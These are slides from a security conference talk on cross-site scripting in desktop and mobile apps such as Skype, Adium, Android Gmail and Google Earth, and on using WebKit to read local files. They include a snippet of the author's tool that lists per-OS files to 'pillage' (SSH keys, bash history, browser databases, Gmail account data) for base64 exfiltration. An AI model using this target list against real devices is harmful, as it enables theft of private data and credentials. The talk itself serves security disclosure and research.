The Hidden XSSAttacking the Desktop & Mobile Platforms

Kos (Kyle Osborn)@theKos

alert(self)

» ToorCon Seattle, BlackHat, BSidesLV & DefCon

» Red Team guy (or so I pretend)

» Pentester

» http://kos.io/

» Oh, and this guy

XSS within the browser

» Usually considered a web browser based attack.» Users fire up their web browsers » Navigate to website with persistent XSS » Open up link with payload in the URL (bank.com?XSS) » iFrame with embedded vulnerable website » etc., etc.

» But... not really browser specific...

XSS

Definition for xss:

Cross-site scripting is a security hazard that allows crackers to interfere with your program’s logic by inserting their own logic into your HTML. ....

http://oreilly.com/ruby/excerpts/ruby-learning-rails/ruby-glossary.html

XSS without the browser 

» So what's the big deal?

» Not really able to steal cookies.

» Phishing doesn't make sense.

» Content spoofing?

» Ad injection?

» Meh...

XSS without the browser 

» Local filesystem access?

» WebKit does not block XHR requests to file:///

» OS X, iOS, Android versions of WebKit » Except for Chrome

» XMLHttpRequest()

So... the fun stuff

» Demos!

Demo #1

» HTML not filtered in an instance, allowing an attacker to inject malicious JavaScript.

» http://kos.io/skype for more info

» Skype (5.0.x to <= 5.0.914) on Mac OS X

Demo #2

» Adium <= 1.4.2 (OS X)

» Unfiltered HTML in file transfer dialogue.

» Almost the same as Skype.

» http://www.noptrix.net/advisories/adium_inject.txt

Demo #3

» Skype on iOS 3.0.1 (Fixed as of 3.0.2)

» Again, basic Cross Site Scripting

» Discovered by while testing Skype on OS X

» More info athttps://superevr.com/2011/xss-in-skype-for-ios/

Demo #3

Introducing WebOS

» Truly web-driven operating system» Easy application development» Posed to compete with iOS / Android

» Oh yeah, apps are HTML5 / JavaScript

WebOS

» WebOS. Because most apps are HTML/JS, many are susceptible to attacks.

» However... actually more secure than previous vulns.

» Security (kind-of) done right on it.

Demo #5

» Android's GMail app

» Reported a few months ago...

» Android (like iOS) uses separate users per application, limiting what each app can reach.

Demo #5 - Continued

» GMail.apk allows HTML files to be downloaded.

» Handles it in "HTML Viewer" properly, without JS.

» However, XSS inside Gmail.app allows attacker to force download file.

» Then force browser to open file:///..../attack.html

For my next trick...  Choose an OS

» Linux

» Windows

» OS X

» iOS

Demo #6

» Google Earth

» Multi-platform - OS X, iOS, Linux & Windows

» Payloaded KML file (Google Earth XML file)

» Uses HTML for info-boxes

» Uses vulnerable WebKit versoin

Tool!

» To make it easier, wrote a tool.

» JSON arrays for discovery functions() [what users, app] and files

» base64 encodes & exfiltrates

Tool!fileList['mac']= { // How do we discover users? "discover" :'/Library/Preferences/com.apple.loginwindow.plist', // Okay, we found them, what do we pillage? "post" :{ 'bashHistory':'.bash_history', 'sshHosts':'.ssh/known_hosts', 'sshKeys':'.ssh/id_rsa.pub', } }

fileList['android']= { // Instead of how, just figure out the currently in use appi "discover" :'/proc/self/status', // Okay, we found them, what do we pillage? "post" :{ 'browser_data':'/data/data/com.android.browser/databases/webview.db', 'browser_data2':'/data/data/com.android.browser/databases/browser.db', 'gmail_accounts':'/data/data/com.google.android.gm/shared_prefs/Gmail.xml', 'dolpin_data':'/data/data/mobi.mgeek.TunnyBrowser/databases/webview.db', 'dolpin_data2':'/data/data/mobi.mgeek.TunnyBrowser/databases/browser.db', 'chromeBookmarks':'.config/chromium/Default/Bookmarks' } }

Conclusion 

» XSS is bad, mkay?

» Developers don't know how / aren't trained to filter client side.

» Easy to exploit.

» Ping me at @theKos kos@kos.io http://kos.io/